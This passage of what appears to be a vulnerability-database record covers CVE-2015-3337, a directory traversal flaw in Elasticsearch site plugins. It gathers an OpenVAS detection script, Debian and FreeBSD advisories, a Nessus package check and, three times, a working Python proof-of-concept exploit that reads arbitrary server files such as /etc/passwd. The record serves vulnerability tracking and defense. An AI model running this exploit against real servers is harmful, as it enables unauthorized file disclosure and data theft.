Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:elasticsearch:elasticsearch\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105265\");\n script_cve_id(\"CVE-2015-3337\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-05-08T11:13:33+0000\");\n\n script_name(\"Elasticsearch Directory Traversal Vulnerability\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP GET request and check the response\");\n\n script_tag(name:\"insight\", value:\"Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2,\n when a site plugin is enabled, allows remote attackers to read arbitrary files.\");\n\n script_tag(name:\"solution\", value:\"Updates are available.\");\n\n script_tag(name:\"summary\", value:\"Elasticsearch is prone to a directory traversal vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Elasticsearch before 1.4.5 and 1.5.x before 1.5.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"last_modification\", value:\"2020-05-08 11:13:33 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-05-05 15:11:20 +0200 (Tue, 05 May 2015)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_elastsearch_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 9200);\n script_mandatory_keys(\"elasticsearch/installed\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! get_app_location( port:port, cpe:CPE ) )\n exit( 0 );\n\nfiles = traversal_files();\nplugins = make_list('test','kopf', 'HQ', 'marvel', 'bigdesk', 'head', 'paramedic', 'elasticsearch', 'git', 'jboss', 'log', 'tomcat', 'wiki');\n\nforeach plugin ( plugins ) {\n url = '/_plugin/' + plugin + '/';\n req = http_get( item:url, port:port );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( buf =~ \"^HTTP/1\\.[01] 200\" ) {\n check_plugin = plugin;\n break;\n }\n}\n\nif( check_plugin ) {\n foreach file ( keys( files ) ) {\n url = '/_plugin/' + check_plugin + '/../../../../../../' + files[file];\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T04:58:45", "description": "ElasticSearch < 1.4.5 / < 1.5.2 - Path Transversal. CVE-2015-3337. Webapps exploit for php platform", "published": "2015-05-18T00:00:00", "type": "exploitdb", "title": "ElasticSearch < 1.4.5 / < 1.5.2 - Path Transversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3337"], "modified": "2015-05-18T00:00:00", "id": "EDB-ID:37054", "href": "https://www.exploit-db.com/exploits/37054/", "sourceData": "#!/usr/bin/python\r\n# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign\r\n# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5\r\n# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net\r\n# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/\r\n#\r\n# Source: https://github.com/pandujar/elasticpwn/\r\n\r\nimport socket, sys\r\n\r\nprint \"!dSR ElasticPwn - for CVE-2015-3337\\n\"\r\nif len(sys.argv) <> 3:\r\n print \"Ex: %s www.example.com /etc/passwd\" % sys.argv[0]\r\n sys.exit()\r\n\r\nport = 9200 # Default ES http port\r\nhost = sys.argv[1]\r\nfpath = sys.argv[2]\r\n\r\ndef grab(plugin):\r\n\t\tsocket.setdefaulttimeout(3)\r\n\t\ts = socket.socket()\r\n\t\ts.connect((host,port))\r\n\t\ts.send(\"GET /_plugin/%s/../../../../../..%s HTTP/1.0\\n\"\r\n\t\t\t\"Host: %s\\n\\n\" % (plugin, fpath, host))\r\n\t\tfile = s.recv(2048)\r\n\t\tprint \"\t[*] Trying to retrieve %s:\" % fpath\r\n\t\tif (\"HTTP/1.0 200 OK\" in file):\r\n\t\t\tprint \"\\n%s\" % file\r\n\t\telse:\r\n\t\t print \"[-] File Not Found, No Access Rights or System Not Vulnerable\"\r\n\r\ndef pfind(plugin):\r\n\ttry:\r\n\t\tsocket.setdefaulttimeout(3)\r\n\t\ts = socket.socket()\r\n\t\ts.connect((host,port))\r\n\t\ts.send(\"GET /_plugin/%s/ HTTP/1.0\\n\"\r\n\t\t\t\"Host: %s\\n\\n\" % (plugin, host))\r\n\t\tfile = s.recv(16)\r\n\t\tprint \"[*] Trying to find plugin %s:\" % plugin\r\n\t\tif (\"HTTP/1.0 200 OK\" in file):\r\n\t\t\tprint \"[+] Plugin found!\"\r\n\t\t\tgrab(plugin)\r\n\t\t\tsys.exit()\r\n\t\telse:\r\n\t\t print \"[-] Not Found \"\r\n\texcept Exception, e:\r\n\t\tprint \"[-] Error connecting to %s: %s\" % (host, e)\r\n\t\tsys.exit()\r\n\r\n# Include more plugin names to check if they are installed\r\npluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']\r\n\r\nfor plugin in pluginList:\r\n\tpfind(plugin)", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37054/"}], "debian": [{"lastseen": "2019-05-30T02:23:08", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3337"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3241-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 29, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : elasticsearch\nCVE ID : CVE-2015-3337\n\nJohn Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.0.3+dfsg-5+deb8u1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your elasticsearch packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2015-04-29T20:33:18", "published": "2015-04-29T20:33:18", "id": "DEBIAN:DSA-3241-1:66E01", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00129.html", "title": "[SECURITY] [DSA 3241-1] elasticsearch security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:14", "description": "\nElasticSearch 1.4.5 1.5.2 - Directory Traversal", "edition": 1, "published": "2015-05-18T00:00:00", "title": "ElasticSearch 1.4.5 1.5.2 - Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3337"], "modified": "2015-05-18T00:00:00", "id": "EXPLOITPACK:C495535BB475BBDF733BEC03D1BDE040", "href": "", "sourceData": "#!/usr/bin/python\n# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign\n# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5\n# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net\n# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/\n#\n# Source: https://github.com/pandujar/elasticpwn/\n\nimport socket, sys\n\nprint \"!dSR ElasticPwn - for CVE-2015-3337\\n\"\nif len(sys.argv) <> 3:\n print \"Ex: %s www.example.com /etc/passwd\" % sys.argv[0]\n sys.exit()\n\nport = 9200 # Default ES http port\nhost = sys.argv[1]\nfpath = sys.argv[2]\n\ndef grab(plugin):\n\t\tsocket.setdefaulttimeout(3)\n\t\ts = socket.socket()\n\t\ts.connect((host,port))\n\t\ts.send(\"GET /_plugin/%s/../../../../../..%s HTTP/1.0\\n\"\n\t\t\t\"Host: %s\\n\\n\" % (plugin, fpath, host))\n\t\tfile = s.recv(2048)\n\t\tprint \"\t[*] Trying to retrieve %s:\" % fpath\n\t\tif (\"HTTP/1.0 200 OK\" in file):\n\t\t\tprint \"\\n%s\" % file\n\t\telse:\n\t\t print \"[-] File Not Found, No Access Rights or System Not Vulnerable\"\n\ndef pfind(plugin):\n\ttry:\n\t\tsocket.setdefaulttimeout(3)\n\t\ts = socket.socket()\n\t\ts.connect((host,port))\n\t\ts.send(\"GET /_plugin/%s/ HTTP/1.0\\n\"\n\t\t\t\"Host: %s\\n\\n\" % (plugin, host))\n\t\tfile = s.recv(16)\n\t\tprint \"[*] Trying to find plugin %s:\" % plugin\n\t\tif (\"HTTP/1.0 200 OK\" in file):\n\t\t\tprint \"[+] Plugin found!\"\n\t\t\tgrab(plugin)\n\t\t\tsys.exit()\n\t\telse:\n\t\t print \"[-] Not Found \"\n\texcept Exception, e:\n\t\tprint \"[-] Error connecting to %s: %s\" % (host, e)\n\t\tsys.exit()\n\n# Include more plugin names to check if they are installed\npluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']\n\nfor plugin in pluginList:\n\tpfind(plugin)", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:12", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3337"], "description": "\nElastic reports:\n\nVulnerability Summary: All Elasticsearch versions prior to 1.5.2\n\t and 1.4.5 are vulnerable to a directory traversal attack that allows\n\t an attacker to retrieve files from the server running Elasticsearch\n\t when one or more site plugins are installed, or when Windows is the\n\t server OS.\nRemediation Summary: Users should upgrade to 1.4.5 or 1.5.2. Users\n\t that do not want to upgrade can address the vulnerability by\n\t disabling site plugins. See the CVE description for additional\n\t options.\n\n", "edition": 4, "modified": "2015-04-27T00:00:00", "published": "2015-04-27T00:00:00", "id": "A71E7440-1BA3-11E5-B43D-002590263BF5", "href": "https://vuxml.freebsd.org/freebsd/a71e7440-1ba3-11e5-b43d-002590263bf5.html", "title": "elasticsearch -- directory traversal attack with site plugins", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:26", "description": "", "published": "2015-05-01T00:00:00", "type": "packetstorm", "title": "ElasticSearch Directory Traversal Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3337"], "modified": "2015-05-01T00:00:00", "id": "PACKETSTORM:131718", "href": "https://packetstormsecurity.com/files/131718/ElasticSearch-Directory-Traversal-Proof-Of-Concept.html", "sourceData": "`#!/usr/bin/python \n# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign \n# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5 \n# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net \n# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/ \n \nimport socket, sys \n \nprint \"!dSR ElasticPwn - for CVE-2015-3337\\n\" \nif len(sys.argv) <> 3: \nprint \"Ex: %s www.example.com /etc/passwd\" % sys.argv[0] \nsys.exit() \n \nport = 9200 # Default ES http port \nhost = sys.argv[1] \nfpath = sys.argv[2] \n \ndef grab(plugin): \nsocket.setdefaulttimeout(3) \ns = socket.socket() \ns.connect((host,port)) \ns.send(\"GET /_plugin/\"+plugin+\"/../../../../../..\"+fpath+ \" HTTP/1.0\\n\" \n\"Host: \"+host+\"\\n\\n\") \nfile = s.recv(2048) \nprint \" [*] Trying to retrieve \"+str(fpath)+\":\" \nif (\"HTTP/1.0 200 OK\" in file): \nprint \"\\n\"+file \nelse: \nprint \"[-] File Not Found or system not vulnerable\" \n \ndef pfind(plugin): \ntry: \nsocket.setdefaulttimeout(3) \ns = socket.socket() \ns.connect((host,port)) \ns.send(\"GET /_plugin/\"+plugin+\"/ HTTP/1.0\\n\" \n\"Host: \"+host+\"\\n\\n\") \nfile = s.recv(16) \nprint \"[*] Trying to find plugin \"+plugin+\":\" \nif (\"HTTP/1.0 200 OK\" in file): \nprint \"[+] Plugin found!\" \ngrab(plugin) \nsys.exit() \nelse: \nprint \"[-] Not Found \" \nexcept Exception, e: \nprint \"[-] Error connecting to \"+host+\" \"+str(e) \nsys.exit() \n \n# Include more plugin names to check if they are installed \npluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head'] \n \nfor plugin in pluginList: \npfind(plugin) \n \n \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131718/elasticpwn.py.txt"}], "nessus": [{"lastseen": "2021-01-12T09:49:05", "description": "John Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.", "edition": 22, "published": "2015-04-30T00:00:00", "title": "Debian DSA-3241-1 : elasticsearch - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3337"], "modified": "2015-04-30T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:elasticsearch"], "id": "DEBIAN_DSA-3241.NASL", "href": "https://www.tenable.com/plugins/nessus/83147", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3241. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83147);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3337\");\n script_bugtraq_id(74353);\n script_xref(name:\"DSA\", value:\"3241\");\n\n script_name(english:\"Debian DSA-3241-1 : elasticsearch - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"John Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/elasticsearch\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3241\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the elasticsearch packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.0.3+dfsg-5+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:elasticsearch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"elasticsearch\", reference:\"1.0.3+dfsg-5+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}